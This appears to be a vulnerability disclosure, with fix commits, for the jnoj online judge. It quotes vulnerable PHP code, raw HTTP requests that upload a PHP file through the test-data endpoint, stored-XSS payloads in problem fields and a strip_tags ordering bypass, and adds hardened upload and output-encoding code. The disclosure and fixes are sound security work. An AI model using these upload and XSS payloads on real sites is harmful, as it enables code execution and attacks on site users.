1. Arbitrary file upload.
Code location: app\modules\polygon\controllers\ProblemController, lines 213 to 228.

```php
// namespace app\modules\polygon\controllers\ProblemController
public function actionTests($id)
{
    $model = $this->findModel($id);
    $solutionStatus = Yii::$app->db->createCommand(
        "SELECT * FROM {{%polygon_status}} WHERE problem_id=:pid AND language IS NULL",
        [':pid' => $model->id]
    )->queryOne();
    if (Yii::$app->request->isPost) {
        // The uploaded content is rewritten in place and then moved using the
        // client-supplied filename with no extension or content check.
        $inputFile = file_get_contents($_FILES["file"]["tmp_name"]);
        file_put_contents($_FILES["file"]["tmp_name"], preg_replace("(\r\n)", "\n", $inputFile));
        @move_uploaded_file(
            $_FILES["file"]["tmp_name"],
            Yii::$app->params['polygonProblemDataPath'] . $model->id . '/' . $_FILES["file"]["name"]
        );
    }
    return $this->render('tests', [
        'model' => $model,
        'solutionStatus' => $solutionStatus
    ]);
}
```
Send an HTTP request with the following content:

```http
POST /jnoj/web/polygon/problem/tests?id=2&file= HTTP/1.1
cache-control: no-cache
Postman-Token: b3ac3880-1ebb-4446-8692-a1a7908d38fa
User-Agent: PostmanRuntime/7.6.0
Accept: */*
Host: 192.168.214.148:8111
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=nh6rh8731c2702be06d9ug3klt
Accept-Encoding: gzip, deflate
content-type: multipart/form-data; boundary=--------------------------993388030406276728804269
Content-Length: 232
Connection: close

----------------------------993388030406276728804269
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php echo phpinfo(); ?>
----------------------------993388030406276728804269--
```
After the request succeeds, visit the URL.
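A hardened form of the upload step, added here as an example and not part of jnoj: it assumes test data files are plain text with one of the extensions in `$allowedExt` (an assumption, not something the issue states) and takes the data root as an argument instead of reading it from `Yii::$app->params`.

```php
<?php
// Added example, not jnoj's code: a hardened version of the upload step in
// actionTests(). Assumptions: test data files are plain text and carry one of
// the extensions in $allowedExt; the data root is passed in explicitly.
declare(strict_types=1);

function saveTestFile(array $upload, string $dataDir, int $problemId,
                      array $allowedExt = ['in', 'out', 'txt']): string
{
    // 1. Only a complete upload that PHP itself received is accepted.
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
            || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('not a valid upload');
    }
    // 2. The client-supplied name is never used as-is: strip any directory
    //    part, allow a conservative character set, and whitelist the extension.
    $name = basename($upload['name']);
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $name) || $name[0] === '.') {
        throw new RuntimeException('bad filename');
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new RuntimeException('extension not allowed: ' . $ext);
    }
    // 3. Defence in depth: the bytes must look like text (empty is fine).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($upload['tmp_name']);
    if (!in_array($mime, ['text/plain', 'application/x-empty'], true)) {
        throw new RuntimeException('unexpected content type: ' . $mime);
    }
    // 4. Resolve the per-problem directory and confirm it stays under the root.
    $dir = rtrim($dataDir, '/') . '/' . $problemId;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create problem directory');
    }
    $root = realpath($dataDir);
    $real = realpath($dir);
    if ($root === false || $real === false || strpos($real, $root . '/') !== 0) {
        throw new RuntimeException('path escapes data directory');
    }
    // 5. Normalise CRLF to LF while writing the final file, rather than
    //    rewriting tmp_name in place, and check that the write succeeded.
    $dest = $real . '/' . $name;
    $text = str_replace("\r\n", "\n", (string) file_get_contents($upload['tmp_name']));
    if (file_put_contents($dest, $text, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    @unlink($upload['tmp_name']);
    return $dest;
}
```

The controller would call it from the `isPost` branch with `$_FILES['file']`, `Yii::$app->params['polygonProblemDataPath']` and `$model->id`, turning the exception into an error response instead of silently moving the file.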
2. Stored XSS in the title when creating a problem
Payload:

```http
POST /jnoj/web/polygon/problem/create HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/create
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=wtOLGZhaHk5SqjzsMg6kdf_zGesVri1U1cqASZiZS_iPtdtJ4TBvETn7WqdbWdchh8dWsnSdWQGSgu0rwcMIjw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb
```
Viewing the problem title list triggers it.
3. Multiple XSS on the problem detail page
Edit the title and add or modify the content. Some of these parameters have their HTML tags escaped into HTML entities by the front end before being sent to the PHP back end. Writing it this way is very unsafe: capture the request and modify the corresponding parameters, and the front-end escaping of tags is meaningless. The modified parameters are as follows.
```http
POST /jnoj/web/polygon/problem/update?id=7 HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1426
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/update?id=7
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=HgqxnDZE_N9BxUyJK4RbVDrSWuzPm90WE3rQuLHtVmxTbOHMTy6NgCqUKsJC0ygAQuYVta6oqUNUMr3a6LcVGw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[description]=<p>asd<script>alert('xss02')</script>;aaaabbbb</p>&Problem[input]=<p>aaaabbbb<script>alert('xss03')</script>>aaaabbbb</p>&Problem[output]=<p><script>alert('xss04')</script>aaaabbbb</p>&Problem[sample_input]=aaaabbbb<script>alert('xss 05')</script>aaaabbbb&Problem[sample_output]=aaaabbbb<script>alert('xss 06')</script>aaaabbbb&Problem[sample_input_2]=aaaabbbb<script>alert('xss 07')</script>aaaabbbb&Problem[sample_output_2]=aaaabbbb<script>alert('xss 08')</script>aaaabbbb&Problem[sample_input_3]=aaaabbbb<script>alert('xss 09')</script>aaaabbbb&Problem[sample_output_3]=aaaabbbb<script>alert('xss 10')</script>aaaabbbb&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p><script>alert('xss14')</p>&Problem[tags]=aaaabbbb<script>alert('xss 
12')</script>aaaabbbb
```
When viewing the problem details, the XSS code triggers 6 times.
The 6 are concentrated here.
The PHP back end's filtering rule for the hint parameter is as follows:
app\modules\polygon\models\Problem, line 123:

```php
$hint = preg_replace("/(\s|\ \;| |\xc2\xa0)/", '', strip_tags($this->hint));
```
Written this way it can be bypassed, because the HTML tags are removed first and the replacement is done afterwards.
When this parameter is output on the front end, the front end also applies a filter, but that had no effect.
I also looked at the admin backend, and it has several XSS vulnerabilities as well.
4. When creating a problem in the backend, the HTTP request is as follows:
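To show why the order of the two steps matters and what the fix looks like, an added example (not jnoj's code): the filter as quoted above beside the same two steps in the other order, plus encoding at output, which is the defence that does not depend on the input filter at all. The whitespace class uses `&nbsp;` in place of the garbled middle alternative on line 123; that is an assumption.

```php
<?php
// Added example, not jnoj's code. Demonstrates the ordering flaw in the
// hint filter quoted above and two ways to close it.
declare(strict_types=1);

// Assumption: this whitespace class stands in for the one on line 123.
const HINT_SPACE = '/(\s|&nbsp;|\xc2\xa0)/';

// As on the page: tags are stripped first, then whitespace is removed.
// strip_tags() does not treat "< " as the start of a tag, so text such as
// "< script>" passes through it, and the whitespace pass then joins it.
function filterHintAsOnPage(string $hint): string
{
    return preg_replace(HINT_SPACE, '', strip_tags($hint));
}

// Same two steps, other order: whitespace goes first, so anything that
// only becomes a tag after joining is already a tag when strip_tags() runs.
function filterHintReordered(string $hint): string
{
    return strip_tags(preg_replace(HINT_SPACE, '', $hint));
}

// The defence that does not rely on the input filter: encode at output,
// so whatever was stored is rendered as text, never as markup.
function renderHint(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: a harmless hint and one with a space after "<".
$benign = "<p>Read the sample carefully</p>";
$spaced = "< script>alert(1)< /script>";

var_dump(filterHintAsOnPage($benign)  === 'Readthesamplecarefully');
var_dump(filterHintAsOnPage($spaced)  === '<script>alert(1)</script>'); // the flaw
var_dump(filterHintReordered($spaced) === 'alert(1)');
var_dump(renderHint(filterHintAsOnPage($spaced))
    === '&lt;script&gt;alert(1)&lt;/script&gt;');
```

Reordering only closes this particular gap; `strip_tags()` is not a sanitizer, so the encoded-output path is the one to rely on wherever the stored value is rendered.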
```http
POST /jnoj/web/admin/problem/create HTTP/1.1
Host: 192.168.214.148:8111
Content-Length: 847
Cache-Control: max-age=0
Origin: http://192.168.214.148:8111
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.214.148:8111/jnoj/web/admin/problem/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=itcn06esd5pbvo9173rcidfmbl
Connection: close

_csrf=uFlAFx9vAKQeVYitGnbYYkvqpzI2IseyK6l2-C1MwKP_CwdRKToz9Vgf8MEtOJk3LNjfWURn_4dO9huqbgOBlA==&Problem[id]=123&Problem[title]=<script>alert('xss')</script>&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[status]=&Problem[status]=0&Problem[description]=<p> </p>&Problem[input]=<p> </p>&Problem[output]=<p> </p>&Problem[sample_input]=<script>alert('xss')</script>&Problem[sample_output]=<script>alert('xss')</script>&Problem[sample_input_2]=&Problem[sample_output_2]=&Problem[sample_input_3]=&Problem[sample_output_3]=&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p> </p>&Problem[source]=&Problem[tags]=&Problem[contest_id]=
```
Triggering page.
5. Backend settings page: after adding XSS code on the settings page, every page in both the front end and the backend triggers it.
The latter two backend XSS vulnerabilities are of little danger, because they require logging in to the backend.
7dde664
Code: app\modules\admin\controllers\ProblemController, lines 307->317. There is also an arbitrary file upload here.
Fixes shi-yang#51: fix some vulnerabilities
adff99f
2e88469
Former-commit-id: ba80cec1b13b6cb85945b4a3a572d5b0bccf7112